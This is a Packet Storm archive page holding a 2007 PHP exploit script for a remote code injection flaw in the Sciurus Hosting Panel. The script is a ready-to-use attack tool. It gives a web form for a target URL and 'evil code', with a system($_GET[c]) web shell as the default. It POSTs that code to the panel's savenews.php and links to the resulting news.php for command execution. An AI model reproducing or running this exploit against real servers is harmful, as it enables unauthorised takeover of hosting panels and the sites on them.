what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sciuris-inject.txt

sciuris-inject.txt
Posted Nov 26, 2007
Authored by Liz0ziM | Site expw0rm.com

Sciurus Hosting Panel remote code injection exploit.

tags | exploit, remote
SHA-256 | 970c84d08146a628ed14566ad0049f63e193da51f4d9ca6972676548a3f8b934

sciuris-inject.txt

Change Mirror Download
<? ob_implicit_flush(true); ?>
<style>
body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}
input,
.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}
button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}
body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
textarea{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}
a:link {
color: #999999;
text-decoration: none;
font-weight: bold;
background-color:#000000;
}
a:visited {
color: #999999;
text-decoration: none;
font-weight: bold;
background-color:#000000;
}
</style><br>
<center>
<h3>Sciurus Hosting Panel Code İnject Exploit</h3><br>
Exploit Coded By Liz0ziM From <a href="http://www.biyofrm.com">BiyoSecurityTeam</a><br>
Greetz My all friend and BiyoSecurityTeam User..
<br>
<form method="POST" action="">
<input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'">
<input name="kodcuk" type="text" value="Evil Code example: <? system($_GET[c]); ?>" size="70" onFocus="if(this.value=='Evil Code example: <? system($_GET[c]); ?>')this.value=''" onBlur="if(this.value=='')this.value='Evil Code example: <? system($_GET[c]); ?>'">
<input name="yolla" type="submit" value="Send Evil Code">
</form>

<br>
<?php
if($_POST[yolla])
{
$adres=$_POST[adres];
$kodcuk=$_POST[kodcuk];
if($adres=="" OR $kodcuk=="") { echo 'Boş Yerleri Doldurun'; exit(); }
echo 'Target= '.htmlspecialchars($adres)."<br>";
sleep(1);
echo 'Evil Code= '.htmlspecialchars($kodcuk)."<br>";
sleep(1);
echo 'Sending Evil Code.......<br>';
$paket1=$adres."/acp/savenews.php";
$paket2="filecontents=".$kodcuk;
$ch = curl_init();

/* <pre><b><? system($_GET[c]); ?></b></pre> */
curl_setopt($ch, CURLOPT_URL, $paket1);

curl_setopt ($ch, CURLOPT_POST, 1);

curl_setopt ($ch, CURLOPT_POSTFIELDS, stripslashes($paket2));

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

$content = curl_exec ($ch);
curl_close ($ch);
sleep(5);
echo "Exploit Has Been Succeful : <a target='_blank' href='".$adres."/includes/news.php'>".$adres."/includes/news.php</a>";
}
?>
</center>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close